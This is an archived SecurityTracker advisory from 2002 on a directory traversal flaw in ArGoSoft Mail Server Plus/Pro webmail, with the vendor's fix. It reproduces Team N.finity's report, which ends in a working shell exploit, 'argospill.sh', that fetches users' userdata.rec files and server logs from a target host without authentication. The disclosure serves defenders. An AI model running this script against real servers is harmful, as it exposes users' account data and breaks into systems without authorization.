Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
ArGoSoft Mail Server Input Validation Flaw Lets Remote Users View Files on the System
|
|
SecurityTracker Alert ID: 1004696 |
|
SecurityTracker URL: http://securitytracker.com/id/1004696
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 3 2002
|
Impact:
Disclosure of system information, Disclosure of user information
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 1.8.1.5 and prior versions
|
Description:
A vulnerability was reported in the ArGoSoft Mail Server Plus/Pro. A remote user can traverse the directory and view files on the system.
Team N.finity issued a security advisory warning that a remote user can perform a reverse directory traversal to view any file on the drive that System can read. This can be achieved by sending a URL to the web server that includes a series of "/.." strings after the path to the images of the webmail server or of the mail attachments for a valid user.
Apparently, the file name must be specified, as directory listings cannot be obtained.
According to the report, the freeware edition of ArGoSoft Mail Server is not vulnerable.
Some demonstration exploit code is provided in the Source Message.
|
Impact:
A remote user can view files located on the same drive as the mail server with the privileges of the mail server.
|
Solution:
The vendor has released a fixed version (1.8.1.6), available at:
http://www.argosoft.com/applications/mailserver/download.asp
|
Vendor URL: www.argosoft.com/applications/mailserver/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Windows (NT), Windows (95), Windows (98), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 3 Jul 2002 13:32:54 +0800
Subject: Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal
|
Team N.finity Security Advisory
03/07/2002
Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal
Summary
===================
Argosoft Mail Server Pro contains a built-in HTTP server for
webmail access. Without logging in, an attacker can do a
reverse directory traversal to retrieve any file on the drive
that System can read by specifying a series of "/.." after the
path to the images of the webmail server or of the mail
attachments for a valid user.
Systems Affected
===================
Any Windows system using the webmail feature of Argosoft Mail
Server Plus / Pro <= 1.8.1.5
The freeware edition of Argosoft Mail Server is not vulnerable.
Impact
===================
An attacker can retrieve any file on the disk readable by
the mail server. The filename and relative path needs to be
specified, as directory listings are not generated. Executable
files are also not run as this is not supported by the webmail.
Explanation
===================
Argosoft Mail Server comes in three versions: Freeware, Plus,
and Pro. The Plus and Pro versions come with a build-in web
server to provide simple Webmail access to users' mail.
The webmail server does not check for reverse directory
traversal. This allows an attacker to exploit the images or
attachments directory to list the contents of files on the
drive.
Also, normally, a user will have to log into Argosoft Mail
Server Pro's webmail in order to read his mail and attachments.
However, it allows non-authenticated users to retrieve files
via the attachments URL, as long as a valid path is specified.
This can be exploited to retrieve the attachments of users in
certain conditions, or can also be reverse traversed.
While the attachments folder is deleted once the user logs out
of the webmail or after 20 minutes of inactivity, this exploit
will work even if the attachments folder is not present.
Solution
===================
The vendor has released a new version at
http://www.argosoft.com/applications/mailserver/
Acknowledgments
===================
Vulnerability discovery, exploit code, and advisory by Mayhem
of Team N.finity.
Contact Information
===================
Team N.finity can be reached by mailing to
nfinity@gmx.net.
References
===================
[1] Team N.finity
http://nfinity.yoll.net/
Disclaimer
===================
This advisory does not claim to be complete or to be usable for
any purpose. Information about the vulnerable systems may be
inaccurate or wrong. Any supplied exploits are not to be used
for malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory
should include link [1].
Exploit Code
===================
#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh
HOST=$1
USER=$2
DOMAIN=$3
startpro()
{
echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
/usr/bin/lynx -dump http://$HOST$URL
}
startplus()
{
echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
URL=/$USER/_tempatt/../userdata.rec
/usr/bin/lynx -dump http://$HOST$URL
}
startboth()
{
echo -e "\nSpilling host $HOST (Plus / Pro)\n"
URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
/usr/bin/lynx -dump http://$HOST$URL
}
usage()
{
echo -e "\nUsage:\n"
echo "Both - $0 <host>"
echo "Pro - $0 <host> <user> <domain>"
echo "Plus - $0 <host> <user>"
echo -e "\nExample:\n"
echo "Both, images dir - $0 www.test.com"
echo "Plus, no dom req - $0 www.test.com me"
echo "Pro, default dom - $0 www.test.com me _nodomain"
echo "Pro, virtual dom - $0 www.test.com me test.com"
}
echo "Argospill 1.0 by Team N.finity"
if [ -n "$HOST" ]; then
if [ -n "$USER" ]; then
if [ -n "$DOMAIN" ]; then
startpro
else
startplus
fi
else
startboth
fi
else
usage
fi
|
|
Go to the Top of This SecurityTracker Archive Page
|
